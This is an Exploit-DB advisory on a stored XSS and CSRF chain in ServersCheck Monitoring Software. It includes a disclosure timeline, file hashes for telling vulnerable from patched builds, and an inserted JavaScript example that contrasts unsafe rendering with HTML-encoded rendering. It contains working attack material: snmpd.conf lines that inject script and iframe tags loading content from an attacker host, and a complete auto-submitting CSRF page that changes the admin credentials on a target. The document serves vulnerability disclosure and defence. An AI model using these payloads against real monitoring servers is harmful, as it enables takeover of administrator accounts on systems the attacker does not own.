ServersCheck Monitoring Software 9.0.12/9.0.14 – Persistent Cross-Site Scripting

  • Author: loneferret
    Date: 2012-10-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/21866/
    # Author: loneferret of Offensive Security
    # Product: ServersCheck Monitoring Software
    # Version: 9.0.12 - 9.0.14 (some versions of 9.0.15)
    # Vendor Site: http://www.serverscheck.com
    # Software Download: http://www.serverscheck.com/monitoring_software/download.asp
    # Note: Older Appliances may be affected.
    
    # Discovered: August 18th 2012
    # Disclosure: 
    # August 18th 2012: Reported to CERT
    # September 5th 2012: Tentative disclosure date October 10th 2012
    # September 5th 2012: Vendor requesting information/procedure on how to reproduce
    # September 5th 2012: Sent vendor procedures
    # September 5th 2012: Vendor says newer version not affected
    # September 5th 2012: Tested new version, conclusion still affected
    # September 5th 2012: Vendor supplied a newer s-server.exe; the tested build is patched.
    # September 6th 2012: 9.0.15 download version is now patched.
    # October 10th 2012: Public release
    
    
    # Software Description:
    # The core of our Monitoring Solution is the award winning ServersCheck Monitoring Software. 
    # This software enables you to monitor any networked device for its availability 
    # and performance. It is agentless: no need to have agents installed on the remote 
    # systems being monitored. It can run on your own Windows system or you can 
    # get it as a box: the ServersCheck Monitoring Appliance. 
    
    # Vulnerabilities:
    # The file responsible for the vulnerability is called "s-server.exe".
    # Across the three versions tested the file's version number does not change, so
    # comparing the MD5 hash of s-server.exe is the way to tell whether an installation
    # is running the vulnerable file. 9.0.13 was not tested; one can only assume it is vulnerable.
    # Versions 9.0.12 & 9.0.14 & 9.0.15 (vulnerable): 
    # s-server.exe HASH: MD5 (s-server.exe) = af38d77e0b150d96f68cba4c3e65f316
    # Version 9.0.15 (patched):
    # s-server.exe HASH: MD5 (s-server.exe) = 3e01ff7201df4eb1c0091784a40f3055
    
    # PoC:
    # Stored XSS & Cross-Site Request Forgery
    # The stored XSS is triggered from a monitored device: set the SNMP sysLocation
    # and sysContact strings in its snmpd.conf to markup that loads attacker-controlled
    # content. When the monitoring software polls the device it stores those values and
    # renders them in its web interface without encoding, so the script runs in the
    # browser of whoever views the page.
    # ..
    # syslocation <script src="http://attacker/xss.js"></script>
    # syscontact <iframe src="http://attacker/scheck-csrf.html"></iframe>
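To make the mechanism concrete, the following is an added example (not code from the advisory or from ServersCheck): it parses the two snmpd.conf directives above, then renders a device row the way a vulnerable UI does (raw string concatenation) and the way a fixed one should (HTML-encoding every polled value). The snmpd.conf fragment, the device name and the table layout are constructed for the example.

```javascript
// Added example, not vendor code: stored XSS via SNMP sysLocation/sysContact,
// unsafe vs. encoded rendering. Node.js, no dependencies.

// Constructed snmpd.conf fragment carrying the advisory's two payloads.
const SNMPD_CONF = `
# snmpd.conf on the monitored host (constructed for this example)
rocommunity public
syslocation <script src="http://attacker/xss.js"></script>
syscontact <iframe src="http://attacker/scheck-csrf.html"></iframe>
`;

// Minimal parser for the two directives the PoC abuses: the first whitespace-separated
// token is the directive, the rest of the line is the value.
function parseSnmpdConf(text) {
  const out = { sysLocation: "", sysContact: "" };
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (!line || line.startsWith("#")) continue;
    const m = line.match(/^(\S+)\s+(.*)$/);
    if (!m) continue;
    const directive = m[1].toLowerCase();
    if (directive === "syslocation") out.sysLocation = m[2];
    if (directive === "syscontact") out.sysContact = m[2];
  }
  return out;
}

// Encode the five characters that matter in HTML text and quoted-attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: polled SNMP strings dropped straight into the markup.
function renderDeviceRowUnsafe(name, snmp) {
  return `<tr><td>${name}</td><td>${snmp.sysLocation}</td><td>${snmp.sysContact}</td></tr>`;
}

// Fixed rendering: every untrusted value is encoded at the point it enters the HTML.
function renderDeviceRowSafe(name, snmp) {
  return `<tr><td>${escapeHtml(name)}</td><td>${escapeHtml(snmp.sysLocation)}</td>` +
    `<td>${escapeHtml(snmp.sysContact)}</td></tr>`;
}

// Detection helper for the example: does the fragment still carry a live script/iframe tag?
function containsRawTag(html) {
  return /<\s*(script|iframe)\b/i.test(html);
}

const snmp = parseSnmpdConf(SNMPD_CONF);
const unsafeRow = renderDeviceRowUnsafe("router1", snmp);
const safeRow = renderDeviceRowSafe("router1", snmp);

console.log("unsafe:", unsafeRow);
console.log("safe:  ", safeRow);
```

The fix is output encoding in the server-side page generator, not input filtering on the SNMP side: the monitoring software has no control over what a polled device returns, so any string from SNMP has to be treated as untrusted when it is written into HTML.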
    
    # CSRF PoC:
    # The settings form is accepted without any anti-CSRF token, so a page on any
    # origin can change the admin credentials of a user who is logged in to the
    # monitoring interface. The syscontact iframe from the XSS above can load this
    # page, chaining the two into a credential change that needs nothing from the
    # victim beyond viewing the monitoring page. Makes for a fun combination.
    # Change Admin credentials
    # File scheck-csrf.html
    <html>
     <body onload="trigger()">
     <script>
    // Submit as soon as the page (or the iframe carrying it) has loaded.
    function trigger() {
    document.getElementById('bad_form').submit();
    }
     </script>
     <!-- Same field names as the product's settings2.html form; the victim's browser
          attaches its session cookie to the cross-site POST. Port 1272 is the one
          used in this PoC; adjust it to the target. -->
     <form id="bad_form" method="post" action="http://target:1272/settings2.html">
    <input name="systemsetting" value="secure" type="hidden">
    <input name="setting" value="SECURE" type="hidden">
    <input value="ok" name="changedsettings" type="hidden">
    <input name="systemsetting" value="SECURE" type="hidden">
    <!-- New admin username and password chosen by the attacker -->
    <input name="XYXadminuser" value="loneferret" type="hidden">
    <input name="adminpass" value="123456" type="hidden">
     </form>
     </body>
    </html>